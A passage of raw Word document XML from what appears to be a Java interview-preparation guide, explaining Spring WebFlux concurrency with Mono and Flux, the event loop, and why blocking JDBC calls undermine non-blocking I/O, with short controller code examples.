          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In non-blocking models, a thread can be used to handle multiple requests, which reduces the overhead of creating new threads for each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6425499D"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Reactive Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Through </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, Spring WebFlux allows the application to react to incoming data asynchronously, making it highly efficient in scenarios where many I/O operations are involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058605F3" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477"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7. Concurrency Example with Flux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019EDCB3"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Here’s how concurrency is handled when using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to return a stream of data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468572F4"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GetMapping("/getUsers")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0897CFC4"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public Flux&lt;User&gt; getUsers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430A37F8"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    return userService.getUsersFromDatabase();  // returns a Flux of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A11ED8C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD30681"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In this example, the thread will not be blocked while waiting for the getUsersFromDatabase() method to retrieve data. Instead, it will return a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> representing the asynchronous sequence of users. The data is fetched and streamed to the client once it's available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AD330A"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The event loop thread handles other incoming requests while the user data is being retrieved in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8BFEF8" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477"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8. Concurrency in WebFlux with Mono:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC13EFF"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Similarly, when working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can handle single asynchronous results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A7A60"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GetMapping("/getUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F55A87E"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public Mono&lt;User&gt; getUser(@RequestParam String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342DA7BD"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 xml:space="preserve">    return userService.getUserFromDatabase(userId);  // returns a Mono of a single user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5688DFD1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF2CD1"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this case, the thread handling the request is not blocked while waiting for the result of the getUserFromDatabase() method, making it ready to handle other requests concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67672A3C" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477"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Advantages of Spring WebFlux's Concurrency Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC379B"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Better Resource Utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With non-blocking I/O and asynchronous processing, fewer threads are required, leading to better resource utilization and reduced overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E2028"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Scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since it doesn't require a thread per request, it can handle many more requests concurrently than traditional models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A47945"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Efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For I/O-bound applications (like querying databases or calling external services), WebFlux performs more efficiently than blocking models by not holding up threads while waiting for I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CD24A2" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477" w:rsidP="00A0015D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Real-time and Reactive Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is well-suited for systems requiring real-time processing and low-latency responses, such as chat applications, live data feeds, and event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56032927" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477" w:rsidP="00A0015D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524E8FE3" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00CE4B95" w:rsidRDefault="00730477" w:rsidP="00A0015D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring WebFlux handles concurrency efficiently by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming model</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Flux and Mono), and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-loop model</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This allows Spring WebFlux to handle many requests concurrently with a minimal number of threads, making it highly scalable and suitable for I/O-bound, high-concurrency applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70036ABC"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DCF02C1">
          <v:rect id="_x0000_i2286" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF9491" w14:textId="7F7524B2"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00" w:name="_Toc196307980"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Can you give an example of a blocking operation in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="500"/>
    </w:p>
    <w:p w14:paraId="22F0764E" w14:textId="3A2FCA8E" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF"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n </w:t>
      </w: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xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when a thread waits for some resource to be available, such as a database query or an external API call, which causes it to block the thread until the operation completes. This defeats the purpose of using the non-blocking, asynchronous nature of WebFlux, which aims to allow threads to be freed up for other tasks while waiting for an operation to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7493A"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Here’s an example of a blocking operation in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C12D6F" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF"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 Blocking Database Call in WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F8BC71"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Suppose you have a database query that is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's how it might look:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61E89C"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13256CEF"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UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD0D283" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F289C37"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FDE5C4"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UserRepository userRepository; // A blocking repository method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E644660" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27ECB73B"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etMapping("/getUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3E0A8E"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User getUser(@RequestParam String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A27C54C"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This is a blocking operation (e.g., fetching from a relational DB with JDBC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C8DB09"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userRepository.findById(userId);  // This is a blocking call!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E87CDBA"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5AEC09F2"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2C467DA7"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n the above example, userRepository.findById() is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it waits for the database to return the result before moving forward. In a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model, while this operation is executing, the thread is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and cannot be used to process any other incoming requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274F495C" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF"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Why Is This a Problem in Spring WebFlux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE1229"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n a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model, each request occupies a thread while waiting for the database or external service to respond. This can quickly lead to thread exhaustion in high-traffic applications, reducing performance and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB6A2A"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With </w:t>
      </w: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non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the goal is to free up threads during the waiting period. So, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations go against this goal and degrade the performance benefits of WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B49ABC" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF"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Solution: Make It Non-Blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A0F118"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o avoid this issue, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> database calls, like those provided by </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Repositories</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data MongoDB</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Spring Data R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or other reactive databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DF48B"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For instance, using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking database call</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AB55A2"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0800F93A"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UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2865E397" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
